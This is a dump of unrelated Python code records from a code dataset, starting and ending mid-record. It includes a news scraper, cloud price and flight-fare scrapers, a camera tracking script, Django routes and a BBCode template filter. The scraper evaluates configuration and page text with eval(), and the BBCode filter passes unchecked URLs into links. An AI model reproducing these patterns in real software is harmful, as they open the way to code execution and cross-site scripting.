str(request.data)})\n","sub_path":"socnet_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"315020698","text":"\"\"\"\nTest each stage in run with multiple input options to make sure configs are handled.\n\"\"\"\nimport os\nimport shutil\n\nimport pytest\n\nfrom QUBEKit.ligand import Ligand\nfrom QUBEKit.run import Execute\nfrom QUBEKit.utils.file_handling import get_data\n\n\n@pytest.mark.parametrize(\n    \"parameter_engine\",\n    [\n        
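# one parametrized case per supported engine; the ids keep pytest output readable\n        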
pytest.param(\"antechamber\", id=\"antechamber\"),\n pytest.param(\"openff\", id=\"openff\"),\n pytest.param(\"xml\", id=\"xml\"),\n ],\n)\ndef test_parametrise_all(parameter_engine, tmpdir):\n \"\"\"\n For each parameter engine make sure the molecule is correctly parameterised.\n \"\"\"\n with tmpdir.as_cwd():\n mol = Ligand.from_file(get_data(\"pyridine.sdf\"))\n mol.parameter_engine = parameter_engine\n if parameter_engine == \"xml\":\n shutil.copy(get_data(\"pyridine.xml\"), \"pyridine.xml\")\n param_mol = Execute.parametrise(molecule=mol, verbose=False)\n # make sure parameters have been found\n for i in range(param_mol.n_atoms):\n assert param_mol.NonbondedForce[i] != [0, 0, 0]\n\n\ndef test_parametrise_missing_file(tmpdir):\n \"\"\"\n If a missing file is provided make sure an error is raised.\n \"\"\"\n with tmpdir.as_cwd():\n mol = Ligand.from_file(get_data(\"acetone.pdb\"))\n mol.home = os.getcwd()\n mol.parameter_engine = \"xml\"\n with pytest.raises(FileNotFoundError):\n _ = Execute.parametrise(molecule=mol, verbose=False)\n\n\ndef test_parametrise_none(tmpdir):\n \"\"\"\n If no engine is passed make sure we init the parameter holders but store nothing.\n \"\"\"\n with tmpdir.as_cwd():\n mol = Ligand.from_file(get_data(\"acetone.pdb\"))\n mol.parameter_engine = \"none\"\n param_mol = Execute.parametrise(molecule=mol, verbose=False)\n for i in range(param_mol.n_atoms):\n assert param_mol.NonbondedForce[i] == [0, 0, 0]\n","sub_path":"QUBEKit/tests/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"178436987","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\nimport re\nfrom xmlparser import Xmlparser\nfrom urllib.request import urlopen\nfrom urllib.parse import urlparse\nfrom pdbmodel import PdbModel\nfrom dateutil import parser\nfrom datetime import datetime\nimport time\n\nclass scraper:\n def __init__(self, url, scrapedata):\n self.scrapedata = scrapedata\n doc = self.get_doc(url)\n self.soup = BeautifulSoup(doc, 'lxml')\n self.db = PdbModel('atscraper')\n # print(eval('self.soup.find(itemprop=\"headline\").text'))\n # print(eval('self.soup.find(itemprop=\"description\").text'))\n # print(eval('self.soup.find(rel=\"author\").text'))\n # print(eval('self.soup.find(\"time\", itemprop=\"datePublished\").text'))\n # print(len(eval('self.soup.select(\"ol > li[role=article]\")')))\n\n def test(self):\n print(eval('self.soup.find(\"h1\", itemprop=\"headline\").text'))\n print(eval('self.soup.find(\"div\", itemprop=\"description\").text'))\n # print(eval('self.soup.find(\"span\", class_=\"shahor art-author\").text'))\n print(eval('self.soup.select_one(\"address > a > span[itemprop=\\'name\\']\").text').split('span')[0])\n # print(eval('self.soup.find(\"span\", class_=\"tb-counter adom ShualBold\")'))\n print(eval('self.soup.select(\"time > span\")[0].text'))\n print(eval('self.soup.select(\"time > span\")[1].text'))\n print(eval('eval(self.soup.find(\"span\", class_=\"count\").text)'))\n # print(eval('self.soup.find(\"span\", class_=\"count\").text'))\n # print(eval('self.soup.select_one(\"div.articleInfo > span\").text'))\n # print(eval('re.findall(r\"[\\w\\.-]+@[\\w\\.-]+\", self.soup.select(\"div.art-launch-date > a\")[0][\"href\"])[0]'))\n # print(eval('self.soup.find(\"time\", itemprop=\"datePublished\").text'))\n # print(len(eval('self.soup.select(\"ol > li[role=article]\")')))\n\n def trystuff(self):\n print(eval('(1, 
2)')[0])\n\n def get_doc(self, url):\n html = urlopen(url)\n return html.read()\n # return requests.get(url).text\n\n def get_feedback_data(self):\n try:\n result = eval(self.scrapedata['scrape']['feedbacks'])\n except AttributeError:\n result = 0\n except Exception:\n result = 0\n return result\n\n def find_secid(self, code, sec):\n # chec = self.soup.find_all('a', href=re.compile('https://finance\\.themarker\\.com/quote/\\?mador=1&documentId=(.*?)'))\n result = eval(code)\n # print(result)\n alltags = []\n # links = [re.findall(r\"\"+sec+\"\", str(a))[0] for a in result]\n # chec = re.findall(r\"https://finance\\.themarker\\.com/quote/\\?mador=1\\&documentId=(.*?)?\\\"\", 'מגדלי הים התיכון')\n # chec = re.findall(r\"https://finance\\.themarker\\.com/quote/\\?mador=1\\&documentId=(.*?)?\\\"\", str(chec[0]))\n # return links\n for a in result:\n # print(str(a))\n chec = re.findall(r\"\"+sec+\"\", str(a))\n if (int(self.scrapedata['instrumentid'])):\n print(\"Check for Instrument ID\", self.scrapedata['instrumentid'])\n chec = self.db.sortInstrumentId(chec[0])\n if(chec):\n alltags.append(chec[0])\n\n return alltags\n # print(chec)\n\n def test_secid(self):\n chec = self.soup.find_all(onclick=re.compile(\"document.location.href='/capitalmarket/quote/generalview/(.*?)'\"))\n chec = re.findall(r\"document.location.href='/capitalmarket/quote/generalview/(.*?)?'\", str(chec[0]))\n print(chec)\n\n def get_data(self):\n data_text = {}\n # print(self.scrapedata['scrape'])\n\n # if(1):\n for i in self.scrapedata['scrape']:\n try:\n tag = i\n text = self.scrapedata['scrape'][i]\n result = {}\n if (tag == 'tag'):\n res = self.find_secid(text, self.scrapedata['sec_id'])\n\n elif (tag == 'feedback'):\n res = len(eval(text))\n else:\n res = eval(text)\n\n data_text[tag] = res\n except AttributeError:\n data_text[tag] = None\n except Exception:\n data_text[tag] = None\n self.compute(data_text)\n\n def get_history_links(self, doc, code):\n self.soup = BeautifulSoup(doc, 'lxml')\n return eval(code)\n\n def validateAllData(self, data):\n for i in data:\n if(data[i]) :\n return 1\n\n return None\n\n def compute(self, data):\n # print(data)\n #{'link': 'https://www.bizportal.co.il/shukhahon/messRss2.xml', 'instrumentid': '0', 'sec_id': \"document.location.href='/capitalmarket/quote/generalview/(.*?)?'\", 'scrape': {'header': 'self.soup.find(\"h1\", itemprop=\"headline\").text', 'sub-header': 'self.soup.find(\"div\", itemprop=\"description\").text', 'writer_name': 'self.soup.select_one(\"address > a > span[itemprop=\\\\\\'name\\\\\\']\").text', 'date': 'self.soup.select(\"time > span\")[0].text', 'time': 'self.soup.select(\"time > span\")[1].text', 'feedbacks': 'eval(self.soup.find(\"span\", class_=\"count\").text)', 'tag': 'self.soup.find_all(onclick=re.compile(\"document.location.href=\\'/capitalmarket/quote/generalview/(.*?)\\'\"))'}}\n dbData = {}\n url = self.scrapedata['link']\n # parsed_uri = urlparse('url')\n website = url.split(\"://\")[1].split(\"/\")[0]\n dbData['url'] = url\n dbData['website'] = website\n # dateobj = datetime.now()\n secondsSinceEpoch = time.time()\n dateobj = time.localtime(secondsSinceEpoch)\n dbData['created_at'] = str('%d-%d-%d %d:%d:%d' % (\ndateobj.tm_year, dateobj.tm_mon, dateobj.tm_mday, dateobj.tm_hour, dateobj.tm_min, dateobj.tm_sec))\n tags = []\n if(self.validateAllData(data)):\n for i in data:\n if(i == 'tag'):\n dbData['sec_id'] = str(len(data[i]))\n tags = data[i]\n elif(i == 'date'):\n if (data['time'] == None):\n dt = parser.parse(data[i])\n date = dt.date()\n 
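# split the parsed datetime into separate date and time fields\n                    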
times = dt.time()\n                    dbData['date'] = date\n                    dbData['time'] = times\n                else:\n                    dbData['date'] = data[i]\n            else:\n                dbData[i] = str(data[i])\n\n\n\n            self.db.insertScrapeData(dbData, tags)\n\n\n\n\n\n\n# scrap = scraper('http://www.bizportal.co.il/shukhahon/biznews02.shtml?mid=767561',{})\n# print(scrap.soup.prettify())\n# scrap.test()\n# scrap.trystuff()\n# scrap.test_secid()\n# print(scrap.find_secid(\"self.soup.find_all('a', href=re.compile('/stocks/home/0,7340,L-3959-(.*?)'))\", '/stocks/home/0,7340,L-3959-(.*?)?,'))","sub_path":"scrapermodel.py","file_name":"scrapermodel.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"}
+{"seq_id":"482718828","text":"import re\n\nfrom aocd import data\n\n\ndef splitter(s):\n    pattern = r\"\\[([a-z]*)\\]\"\n    ins = re.findall(pattern, s)\n    outs = re.sub(pattern, \" \", s).split()\n    return ins, outs\n\n\ndef chunker(s, size):\n    i = 0\n    while len(s[i : i + size]) == size:\n        yield s[i : i + size]\n        i += 1\n\n\ndef has_abba(s):\n    for a, b, b_, a_ in chunker(s, 4):\n        if a == a_ and b == b_ and a != b:\n            return True\n    return False\n\n\ndef gen_aba(s):\n    for a, b, a_ in chunker(s, 3):\n        if a == a_ and a != b:\n            yield a + b + a\n\n\ndef has_aba(s):\n    return bool(next(gen_aba(s), False))\n\n\ndef support_tls(s):\n    ins, outs = splitter(s)\n    return has_abba(\".\".join(outs)) and not has_abba(\".\".join(ins))\n\n\ndef support_ssl(s):\n    ins, outs = splitter(s)\n    for a, b, _ in gen_aba(\"..\".join(ins)):\n        bab = b + a + b\n        if bab in \"..\".join(outs):\n            return True\n    return False\n\n\nassert support_tls(\"abba[mnop]qrst\")\nassert not support_tls(\"abcd[bddb]xyyx\")\nassert not support_tls(\"aaaa[qwer]tyui\")\nassert support_tls(\"ioxxoj[asdfgh]zxcvbn\")\n\nassert support_ssl(\"aba[bab]xyz\")\nassert not support_ssl(\"xyx[xyx]xyx\")\nassert support_ssl(\"aaa[kek]eke\")\nassert support_ssl(\"zazbz[bzb]cdb\")\n\n\ntls = ssl = 0\nfor line in data.splitlines():\n    tls += support_tls(line)\n    ssl += support_ssl(line)\n\nprint(tls) # 115\nprint(ssl) # 231\n","sub_path":"aoc_wim/aoc2016/q07.py","file_name":"q07.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"}
+{"seq_id":"7743571","text":"\"\"\"This module performs web scraping to obtain prices and characteristics\nof Azure virtual machines\"\"\"\n\nimport logging\nimport json\nfrom lxml import etree\nfrom io import StringIO\n\n\nclass AzurePrices:\n    def __init__(self, filename):\n        self.filename = filename\n        self.log = logging.getLogger(__name__)\n        self.log.info(\"Filename=%r\", filename)\n\n    def parse_vm(self, node):\n        \"\"\"Receives an etree node from which all the data about a VM type can\n        be extracted. This code is very fragile because it depends on the\n        structure of the web page, which can be changed by Microsoft\"\"\"\n\n        dic = {}\n        # Get data about this VM type, which is two cells above\n        cells = node.xpath(\"td\")\n\n        # First four cells in the row contain hardware features\n        cols = [\"Instance\", \"Cores\", \"RAM\", \"DISK\"]\n        for i, c in enumerate(cells[:-1]):\n            dic[cols[i]] = \" \".join([data.strip()\n                                     for data in c.xpath(\".//text()\")\n                                     ])\n        # VM tier is more difficult. 
It is extracted from the last h3 title\n        dic[\"Tier\"] = node.xpath(\"preceding::h3/text()\")[-1].strip()\n\n        # Last cell is a <span data-amount=\"xxx\">, being xxx a JSON string\n        # which contains prices and regions\n        data_amount = cells[-1].xpath(\"./span/@data-amount\")[0]\n        if not data_amount.startswith(\"{\"):\n            return None\n        price_data = json.loads(data_amount)\n        # Default price for all regions\n        if \"default\" in price_data:\n            dic[\"default\"] = price_data[\"default\"]\n        # Specific price for some regions\n        for region, price in price_data[\"regional\"].items():\n            dic[region] = float(price)\n        return dic\n\n    def scrape(self):\n        with open(self.filename, \"r\") as f:\n            r = f.read()\n        parser = etree.HTMLParser()\n        self.log.info(\"Scraping data from Azure web\")\n        tree = etree.parse(StringIO(r), parser)\n        data = []\n        tiers = tree.xpath(\"//*[contains(@class, 'table-width-even')]\")\n        for tier in tiers:\n            vms = tier.xpath(\".//tr\")\n            for vm in vms[1:]:\n                data.append(self.parse_vm(vm))\n        return json.dumps(data)\n\n    def scrape_and_save(self, filename):\n        self.log.info(\"About to scrape %s\", self.filename)\n        data = self.scrape()\n        self.log.info(\"About to save %s\", filename)\n        with open(filename, \"w\") as f:\n            f.write(data)\n\n\nif __name__ == \"__main__\":\n    # For testing purposes only. This module is not intended\n    # to be run from command line, but from Snakefile\n    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n    logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n    df = AzurePrices(\"/tmp/azure-web.html\").scrape()\n","sub_path":"src/data/azure_scrap.py","file_name":"azure_scrap.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"15145609","text":"from sys import exit\nimport oo_appointment_manager as apnt_mngr\n\ndo = apnt_mngr.Appointment(\"\", apnt_mngr.Duration(apnt_mngr.Time(\"\"), apnt_mngr.Time(\"\")))\n\nappointments_dict = {\n\t\t\"monday\"\t: [],\n\t\t\"tuesday\"\t: [],\n\t\t\"wednesday\" \t: [],\n\t\t\"thursday\"\t: [],\n\t\t\"friday\"\t: [],\n\t\t\"saturday\"\t: [],\n\t\t\"sunday\"\t: []\n}\n\ndays_index = {\"monday\":0, \"tuesday\":1, \"wednesday\":2, \"thursday\":3, \"friday\":4, \"saturday\":5, \"sunday\":6}\n\napps_from_file = do.get_appointments_from_file()\t\t\t# [['monday', ' 7:00-7:25']], len = 7\n\ndurations = [[], [], [], [], [], [], []]\t\t\t\t# List keeps track of Duration()'s.\n\n# This short block of code initializes appointments from the text file.\ni = 0\nfor day in apps_from_file:\t\t\t\t\t\t# day = ['monday', ' 7:00-7:25']\n\tday_ = day[0]\n\tfor duration in day:\n\t\tduration = duration.strip().split(\"-\")\n\t\tapnt_mngr.duration_and_appnt_init(duration, durations, i, day, appointments_dict)\n\ti += 1\n\nvalid_actions = [\"add\", \"remove\", \"all\", \"help\"]\n\ntry:\n\tuser_input = input(\">>> \")\n\twhile user_input != \"exit\":\n\n\t\tuser_input = user_input.lower().split(\" \")\n\n\t\tif user_input[0] in valid_actions or user_input[0] in appointments_dict:\n\t\t\taction = user_input[0]\n\t\t\tdo.sort_appointments(appointments_dict)\n\t\t\t\n\t\t\tif len(user_input) == 1:\n\t\t\t\tif action == \"all\":\n\t\t\t\t\tdo.print_all_appointments(appointments_dict)\n\t\t\t\telif action in appointments_dict:\n\t\t\t\t\tdo.print_certain_appointments(appointments_dict, action)\n\t\t\t\telif action == \"help\":\n\t\t\t\t\tprint(apnt_mngr.help_())\n\t\t\n\t\t\telse:\n\t\t\t\tuser_input = \" \".join(user_input[1:])\t# 'thursday, 15:00-16:00'\n\t\t\t\tuser_input = 
user_input.split(\",\")\t# ['thursday', ' 15:00-16:00']\n\t\t\t\n\t\t\t\t# This try: except block is needed to handle data that isn't in this format: ['day', 'duration']\n\t\t\t\ttry:\n\t\t\t\t\tuser_input = [user_input[0], user_input[1].strip().split(\"-\")[0], user_input[1].strip().split(\"-\")[1]]\t# ['thursday', ['15:00', '16:00']]\n\t\t\t\texcept IndexError:\n\t\t\t\t\tpass\n\n\t\t\t\t# Adding and removing appointments.\n\t\t\t\tif len(user_input) == 3:\n\t\t\t\t\ti = days_index[user_input[0]]\n\t\t\t\t\tif action == \"add\":\n\t\t\t\t\t\tapnt_mngr.duration_and_appnt_add(user_input, durations, appointments_dict, i)\n\t\t\t\t\telif action == \"remove\":\n\t\t\t\t\t\tapnt_mngr.duration_and_appnt_remove(user_input, durations, appointments_dict, i)\n\t\tprint()\n\t\tuser_input = input(\">>> \")\n\n\tdo.write_appointments_to_file(appointments_dict)\t\t# Update appointments in appointments.txt\n\nexcept KeyboardInterrupt:\n\tdo.write_appointments_to_file(appointments_dict)\n\tprint()\n","sub_path":"object_oriented_style/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"50090696","text":"# The sum of the squares of the first ten natural numbers is\n# 1^2 + 2^2 + ... + 10^2 = 385\n# The square of the sum of the first ten natural numbers is,\n# (1 + 2 + ... + 10)^2 = 55^2 = 3025\n# Hence the difference between the sum of the squares of the \n# first ten natural numbers and the square of the sum is\n# 3025 - 385 = 2640.\n\n# Find the difference between the sum of the squares of the \n# first one hundred natural numbers and the square of the sum.\n\ntheSum = sum(range(1, 101))\nsquareOfTheSum = theSum*theSum\n\nsumOfTheSquares = 0\nfor x in range(1, 101):\n    sumOfTheSquares += x*x\n    print(sumOfTheSquares)\n\ndifference = squareOfTheSum - sumOfTheSquares\n\nprint(difference)\n","sub_path":"006.py","file_name":"006.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"58133723","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@__Create Time__ = 2018/1/25 3:50 PM\n@__Description__ = \" \"\n\"\"\"\nfrom django.urls import path\nfrom .views import asset,outsider,group,asset_detail,group_detail\n\nurlpatterns = [\n    path('list', asset.AssetListView.as_view(), name='asset_list'),\n    path('create', asset.CreateAssetView.as_view(), name='create_asset'),\n    path('activate/<int:pk>', asset.ActivateAssetView.as_view(), name='activate_asset'),\n    path('delete/<int:pk>', asset.DeleteAssetView.as_view(), name='delete_asset'),\n    path('edit/<int:pk>', asset.EditAssetView.as_view(), name='edit_asset'),\n    path('export',outsider.ExportAssetView.as_view(),name='export'),\n    path('import',outsider.ImportAssetView.as_view(),name='import'),\n\n    path('<int:pk>/detail/addition/group',asset_detail.AssetDetailAdditionGroupView.as_view(),name='asset_detail_addition_group'),\n    path('<int:pk>/detail/delete/group',asset_detail.AssetDetailDeleteGroupView.as_view(),name='asset_detail_delete_group'),\n    path('<int:pk>/detail',asset_detail.AssetDetailView.as_view(),name='asset_detail'),\n\n    path('asset-group/list',group.AssetGroupListView.as_view(),name='asset_group_list'),\n    path('asset-group/create',group.CreateAssetGroupView.as_view(),name='create_asset_group'),\n    path('asset-group/delete/<int:pk>',group.DeleteAssetGroupView.as_view(),name='delete_asset_group'),\n    path('asset-group/edit/<int:pk>', group.EditAssetGroupView.as_view(), name='edit_asset_group'),\n    
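# the group detail routes below carry the group's primary key in the URL\n    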
path('asset-group/<int:pk>/detail',group_detail.AssetGroupDetailView.as_view(),name='asset_group_detail'),\n    path('asset-group/<int:pk>/detail/addition/asset',group_detail.AssetGroupDetailAdditionAssetView.as_view(),\n         name='asset_group_detail_addition_asset'),\n    path('asset-group/<int:pk>/detail/delete/asset',group_detail.AssetGroupDetailDeleteAssetView.as_view(),\n         name='asset_group_detail_delete_asset'),\n]","sub_path":"asset/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"419418702","text":"#PanTilt code\n\nimport cv2\nimport numpy as np\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport smbus\nimport time\nbus = smbus.SMBus(1)\n\naddress = 0x04 #for I2C with Arduino\n\ndef writeNumber(value):\n    bus.write_byte(address,value)\n    return -1\n\ndef readNumber():\n    number = bus.read_byte(address)\n    return number\n\nimageWidth = 320 # Camera image width\nimageHeight = 240 # Camera image height\n\ncamera = PiCamera()\ncamera.resolution = (imageWidth,imageHeight)\ncamera.framerate = 18\nframeCapture = PiRGBArray(camera,size = (imageWidth,imageHeight))\n\nfor frame in camera.capture_continuous(frameCapture,format = \"bgr\", use_video_port=True):\n\n    image = frame.array\n\n    #flip image to correct orientation\n    image = cv2.flip(image,0)\n    image = cv2.flip(image,1) #left-right\n\n    #Blur - remove initial noise (low pass filter kernel)\n    image = cv2.medianBlur(image,5)\n    \n    #convert to HSV image (basic thresholding)\n    #Hue (0,179), Saturation (0,255), Value (0,255)\n    hsv = cv2.cvtColor(image,cv2.COLOR_BGR2HSV) \n\n    redLower = np.array([50,100,100]) \n    redUpper = np.array([240,255,250])\n    \n    mask = cv2.inRange(hsv,redLower,redUpper)\n    #result = cv2.bitwise_and(image,image,mask = mask)\n    cv2.imshow(\"test\",mask)\n    \n    #Using contours for error calculation\n    #each contour is a numpy array of (x,y) coordinates = boundary of a shape\n    img,contours,hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n    #Create bounding rectangle\n    minArea = 200 #threshold (can modify later to get largest)\n    c_max = 1\n    #Setpoint\n    sp_x = imageWidth/2 #160\n    sp_y = imageHeight/2 #120\n    \n    for c in contours:\n        CArea = cv2.contourArea(c)\n        if CArea < minArea:\n            continue\n        x,y,w,h = cv2.boundingRect(c)\n        #cv2.drawMarker(img,(sp_x,sp_y),(255,0,255),cv2.MARKER_CROSS,5,1) \n\n        img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,255,0),2)\n        cv2.imshow(\"test\",img)\n\n        #Measured Centre of Box\n        measured_x = x + w/2\n        measured_y = y + h/2\n\n        #print(\"image shape\",img.shape)\n        #print(\"Image_X: \", sp_x)\n        #print(\"Image_Y: \", sp_y)\n        #print(\"BoxCentre_X: \", measured_x)\n        #print(\"BoxCentre_Y: \", measured_y)\n        \n        #Error\n        error_x = abs(sp_x - measured_x)\n        error_y = abs(sp_y - measured_y)\n\n        print(\"Error_x: \", error_x)\n        print(\"Error_y: \", error_y)\n        print(\"\\n\")\n        \n    #Command servo motors to turn on Arduino\n    while ():\n        var = input(\"Test\")\n\n        writeNumber(var)\n        print(\"Number sent was: \", var)\n        time.sleep(1)\n        number = readNumber()\n        print(\"I received: \", number)\n\n    #GUI stuff\n    key = cv2.waitKey(5) & 0xFF\n\n    frameCapture.truncate(0)\n\n    if key == ord(\"q\"):\n        break\n\n","sub_path":"pantilt.py","file_name":"pantilt.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"185022565","text":"import matplotlib.pyplot as plt\nfrom random_walk import RandomWalk\n\n\n# Keep simulating random walks for as long as the program is active\nwhile True:\n    
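# build a fresh walk and plot it on every pass through the loop\n    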
rw = RandomWalk()\n    rw.fill_walk()\n    point_Numbers = list(range(rw.num_points))\n    plt.scatter(rw.x_values, rw.y_values, edgecolors=None, c=point_Numbers, cmap=plt.cm.Blues, s=15)\n    plt.show()\n\n\n    keep_running = input(\"Make another walk? (y/n)\\n\")\n    if keep_running == \"n\":\n        break","sub_path":"python_work/第二部分/项目2 数据可视化/Chapter 15/15.3/rw_visual_v3.py","file_name":"rw_visual_v3.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"106333970","text":"import datetime\nimport random\nimport time\n\nimport requests\n\n\ndef request(request):\n    response = requests.get(request)\n    response.raise_for_status()\n    return response\n\n\ndef params():\n    with open(\"params_os.txt\", \"r\") as param_file:\n        strings = [x.rstrip() for x in param_file.readlines() if x[0] != '#']\n    params = []\n    for i in strings:\n        p = str.split(i, ',')\n        d = {'fro': p[0], 'to': p[1], 'dt': p[2], 'adt': p[3], 'vend': p[4]}\n        params.append(d)\n    return params\n\n\ndef random_date(start):\n    end = start + datetime.timedelta(days=180)\n    delta = end - start\n    random_day = random.randrange(delta.days)\n    return start + datetime.timedelta(days=random_day)\n\n\ndef get_search_session(params):\n    date = random_date(datetime.datetime.today())\n    d1 = date.strftime(\"%Y-%m-%d\")\n    d2 = random_date(date).strftime(\"%Y-%m-%d\")\n    # dt = params['dt']\n    if random.randint(0, 2) > 2:\n        serq = 'http://yandexapi.dohop.com/api/v1/search/yandex/is/IS/%s/%s/%s?n_adults=%s&include_vendors=%s' % (\n            params['fro'].upper(), params['to'].upper(), d1, params['adt'], params['vend'])\n    else:\n        serq = 'http://yandexapi.dohop.com/api/v1/search/yandex/is/IS/%s/%s/%s/%s?n_adults=%s&include_vendors=%s' % (\n            params['fro'].upper(), params['to'].upper(), d1, d2, params['adt'], params['vend'])\n    print(serq)\n    serr = request(serq)\n    serr.raise_for_status()\n    return serr.json()['key']\n\n\ndef poll(session, continuation):\n    pollq = 'http://yandexapi.dohop.com/api/v1/poll/%s/%s' % (session, continuation)\n    pollr = request(pollq)\n    pollr.raise_for_status()\n    return pollr.json()\n\n\ndef get_fares(session):\n    print('http://yandexapi.dohop.com/api/v1/poll/%s/0' % (session), '\\npolling ', end=\"\", flush=True)\n    isdone = False\n    continuation = 0\n    while not isdone:\n        print(continuation, end=\" \", flush=True)\n        poll_response = poll(session, continuation)\n        isdone = poll_response[\"is_done\"]\n        continuation = poll_response[\"continuation\"]\n        time.sleep(1)\n    else:\n        final_poll = poll(session, 0)\n        if \"fares\" in final_poll.keys():\n            print('')\n            return final_poll\n        else:\n            print('done, no fares')\n            return None\n\n    # with open(\"output.json\",\"w\") as output:\n    # \toutput.write(json.dumps(pollr.json(), sort_keys=True, indent=4, separators=(',', ': ')))\n    # \tprint('done')\n\n\ndef print_links(session, vend, fares):\n    for key, item in sorted(fares):\n        link = 'http://edge.dohop.com/yandex/ru/?session=%s&vendor=%s&fare=%s&currency=%s' % (session, vend, key, 'EUR')\n        print(key, vend, round(item['f'][vend]['f'], 2), item['f'][vend]['c'], link)\n\n\nparams = params()\nfor param in params:\n    session = get_search_session(param)\n    fares = get_fares(session)\n    if fares is not None:\n        print_links(session, param['vend'], fares['fares'].items())\n        print('\\n')\n\n# http://api.dohop.com/transfer/v1/{key}/{fare-id}/{vendor-id}/{currency}\n# 
http://edge.dohop.com/yandex/ru/?session=0326e3facea54343a8f53ce4156d77f2&vendor=934&fare=0&currency=RUB\n","sub_path":"vendor_check/get_transfer.py","file_name":"get_transfer.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"143319028","text":"# -*- coding: utf-8 -*-\nfrom google.appengine.ext import webapp\n\n# get template register\nregister = webapp.template.create_template_register()\n\nDEBUG = True\n\ndef bbcode_content(value):\n    \"\"\"\n    Ref. http://code.djangoproject.com/wiki/CookBookTemplateFilterBBCode\n    \"\"\"\n    import re\n\n    pat = re.compile(r'<([^>]*?)>', re.DOTALL | re.M)\n    value = re.sub(pat, '&lt;\\\\1&gt;', value)\n\n    bbdata = [\n        (r'\\[url\\](.+?)\\[/url\\]', r'<a href=\"\\1\">\\1</a>'),\n        (r'\\[url=(.+?)\\](.+?)\\[/url\\]', r'<a href=\"\\1\">\\2</a>'),\n        (r'\\[email\\](.+?)\\[/email\\]', r'<a href=\"mailto:\\1\">\\1</a>'),\n        (r'\\[email=(.+?)\\](.+?)\\[/email\\]', r'<a href=\"mailto:\\1\">\\2</a>'),\n        (r'\\[img\\](.+?)\\[/img\\]', r'<img src=\"\\1\">'),\n        (r'\\[img=(.+?)\\](.+?)\\[/img\\]', r'<img src=\"\\1\" alt=\"\\2\">'),\n        (r'\\[b\\](.+?)\\[/b\\]', r'<b>\\1</b>'),\n        (r'\\[i\\](.+?)\\[/i\\]', r'<i>\\1</i>'),\n        (r'\\[u\\](.+?)\\[/u\\]', r'<u>\\1</u>'),\n        (r'\\[quote\\](.+?)\\[/quote\\]', r'<blockquote>\\1</blockquote>'),\n        (r'\\[center\\](.+?)\\[/center\\]', r'<div align=\"center\">\\1</div>'),\n        (r'\\[code\\]\\s?(.+?)\\[/code\\]', r'<code>\\1</code>'),\n        (r'\\[big\\](.+?)\\[/big\\]', r'<big>\\1</big>'),\n        (r'\\[small\\](.+?)\\[/small\\]', r'<small>\\1</small>'),\n        (u'\\\\n', r'<br />'),\n    ]\n\n    for bbset in bbdata:\n        p = re.compile(bbset[0], re.DOTALL)\n        value = p.sub(bbset[1], value)\n\n    #The following two code parts handle the more complex list statements\n    temp = ''\n    p = re.compile(r'\\[list\\](.+?)\\[/list\\]', re.DOTALL)\n    m = p.search(value)\n    if m:\n        items = re.split(re.escape('[*]'), m.group(1))\n        for i in items[1:]:\n            temp = temp + '<li>' + i + '</li>'\n        value = p.sub(r'<ul>' + temp + '</ul>', value)\n\n    temp = ''\n    p = re.compile(r'\\[list=(.)\\](.+?)\\[/list\\]', re.DOTALL)\n    m = p.search(value)\n    if m:\n        items = re.split(re.escape('[*]'), m.group(2))\n        for i in items[1:]:\n            temp = temp + '<li>' + i + '</li>'\n        value = p.sub(r'<ol type=\"\\1\">' + temp + '</ol>', value)\n\n    return value\n\nregister.filter(bbcode_content)\n\ndef bbcode(value):\n    from tools.templatetags.bbcode import render_bbcode\n    return render_bbcode(value)\nbbcode.is_safe = True\n\ndef strip_bbcode(value):\n    from tools.templatetags.bbcode import strip_bbcode\n    return strip_bbcode(value)\nstrip_bbcode.is_safe = True\n\nfrom datetime import tzinfo, timedelta\nclass TaiwanTimeZone(tzinfo):\n    '''CST'''\n    ZERO = timedelta(0)\n    PLUS_2 = timedelta(minutes = 3 * 60)\n    def utcoffset(self, dt):\n        return self.PLUS_2\n\n    def tzname(self, dt):\n        return \"CST\"\n\n    def dst(self, dt):\n        return self.ZERO\n\ndef twtz(value):\n    #from datetime import timedelta\n    return (value + timedelta(hours = 3)).replace(tzinfo = TaiwanTimeZone())\n\nfrom tools.templatetags.smiles import smile_filter\nfrom tools.templatetags.mail_filter import mail_filter, mail_filter_table\nfrom tools.templatetags.bbcode_filter import bbcode_filter\nfrom tools.templatetags.foto_filter import fotofilterm, fotofilterm2, fotofilterpc, fotofilterpc2\nfrom tools.templatetags.user_filter import userfilter2, userfilter, userfilter3, 